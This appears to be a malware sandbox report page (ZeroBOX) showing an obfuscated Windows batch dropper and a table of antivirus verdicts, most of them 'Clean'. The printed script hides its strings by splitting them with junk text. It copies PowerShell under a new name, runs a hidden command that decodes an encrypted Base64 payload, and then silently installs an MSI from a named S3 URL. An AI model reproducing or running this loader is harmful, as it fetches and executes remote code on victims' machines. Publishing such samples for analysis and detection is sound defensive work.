Static | ZeroBOX
No static analysis available.
:: jYMNDmOZLi3PKIzVsfNaeCVeF/694zK5K+pbvumN9DT8wX4A4LSipOo4tNGSHKKlVx8us2ukrUxG5c6uHTQd1oWDYeqUK9PTF8G/rgS97lfNC885yioNVnH6sYYd1A4ut6AaG++FeNdk+x41Uod8i78WD2evXO6sEOtnrsRPWQoRFziirqZ3YVL+aejbN2q66lJUmCXz/aNYtPUmj9EwZ7D/e83JCUkpn/5ZNpVgBpWmf/d77V9u5zjMp0PCHwHjds2Df+fhMK6vzHPrqmmm6oh3tNYSqNz19Mx+YotPwGKqnfWKdMNkL+fVohy9W+koDZ8OVnBr4POFH0RXlPOU617ntN4leA+sEwgFZX1QQS7I+xfuaUJ/uxFHqW5FIuQWWLxYuJLdeGMay7hLqlnJ3Faml6Bc2VwmneEFvRZOe1+0CBQ5aB0q91DqwaKsl74Gfjww/zO6jutUEyyHSthd8vL1kzjaFQBFRWPm0g78Of3xECxK3Jb13FWQEc++a9UQMsetYZrB5rdKpbXit4mqjfF5uakmFhSBOrvP0Mke7gS/h0VP0b/SupghPb4bxk+W7J2AmZ3gmKKidFS5S4XIYWH/NLoFBeohF79EpoWWvn2yNmSoRx2ZZDcfQGFzt8Gb5TF6CQ95B2V1Q6a57QM+LSzDDEi5+NxZl3ZZf5QUJ5BCBP5wk6aiGQi9qnQVma2GSe3WAZ9tuxS/quWXMlRXhP3VsLmUM6COycvo0OYEcJGxzE1buny6ypBzVNLkw+6dzwme+MiAKi7IV1HuoqiR3YCEytfE/PX1MEAMd9UQZXflHwdTm4k6tLCQT2pYC/CvHdBZl1NMq6UBK/jNB3BHlNPN/gk5M5lYV4+o7Ly7XgD608aj7+nHkmHnvlyeMR7VtcLitIgswrCfh8qBQXbxvirdhLrxQnXu/gjNIgdWIEJSxI15LXNxSVj6oIbG5NTRYd8+ez+bF3ctFNY2QigLcNh/3Pl8hDhsTlW6g7CmNJY47usXKY4CeoxPdv9Tm
@echo off
set "hAySry=seVDcNet VDcNeNVDcNetVVDcNe=1VDcNe VDcNe&& sVDcNetarVDcNet "VDcNe" VDcNe/miVDcNen VDcNe"
if not defined NtV (%hAySry:VDcNe=%%0 && exit)
set lKJnIk=%~0.exe
set "ZoRFBj=WinVDcNedowVDcNesPoVDcNewerVDcNeShelVDcNel\vVDcNe1.VDcNe0\pVDcNeowVDcNeersVDcNehelVDcNel.eVDcNexeVDcNe"
set FoHoLN=C:\Windows\System32\%ZoRFBj:VDcNe=%
copy %FoHoLN% "%lKJnIk%" /y
set "kfgPoG=-wVDcNe hiVDcNeddeVDcNen -VDcNec VDcNe$VDcNeRwyVDcNey='VDcNeReYVDcNenHVDcNeaVDcNeaVDcNeYVDcNenHaVDcNedVDcNeLiVDcNeYnVDcNeHanVDcNeesYnVDcNeHaVDcNe'.RVDcNeepVDcNelaVDcNece(VDcNe'VDcNeYVDcNenVDcNeHa',VDcNe 'VDcNe')VDcNe;VDcNe$PVDcNemVDcNeMVDcNek=VDcNe'TVDcNeraYVDcNenHaVDcNensVDcNeYnHVDcNeafVDcNeoYnVDcNeHaVDcNermVDcNeYnVDcNeHaVDcNeFVDcNeinaVDcNeYnHVDcNealYVDcNenHVDcNeaBlVDcNeYnHVDcNeaoVDcNeckYnVDcNeHa'VDcNe.ReVDcNeplVDcNeacVDcNee(VDcNe'YnVDcNeHa'VDcNe, VDcNe''VDcNe);VDcNe$MVDcNefYp=VDcNe'VDcNeFVDcNeirVDcNeYnHVDcNeastVDcNeYnHVDcNea'VDcNe.VDcNeRepVDcNelVDcNeaceVDcNe('YVDcNenHVDcNea', VDcNe'');VDcNe$kVgVDcNej='VDcNeFrVDcNeoYVDcNenHaVDcNemYnVDcNeHaVDcNeBYnVDcNeHaaVDcNesYnVDcNeHae6VDcNeYnVDcNeHaVDcNe4StVDcNeYnVDcNeHaVDcNerVDcNeiVDcNeYnHVDcNeangVDcNeYnVDcNeHaVDcNe'VDcNe.VDcNeRVDcNeeVDcNeplVDcNeacVDcNee('VDcNeYVDcNenHaVDcNe'VDcNe,VDcNe ''VDcNe);VDcNe$aHVDcNeWrVDcNe='CVDcNehVDcNeYnVDcNeHaVDcNeaVDcNenYnVDcNeHagVDcNeeEVDcNexYVDcNenHaVDcNeteVDcNenYnVDcNeHVDcNeasVDcNeiYVDcNenHVDcNeaonVDcNeYnVDcNeHaVDcNe'.RVDcNeep
call "%lKJnIk%" %kfgPoG:VDcNe=%
powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 20"
powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'msiexec.exe' -ArgumentList '/i', 'https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi', '/qn' -Wait -WindowStyle Hidden"
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Clean
MAX Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet BAT/Kryptik.FU!tr
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.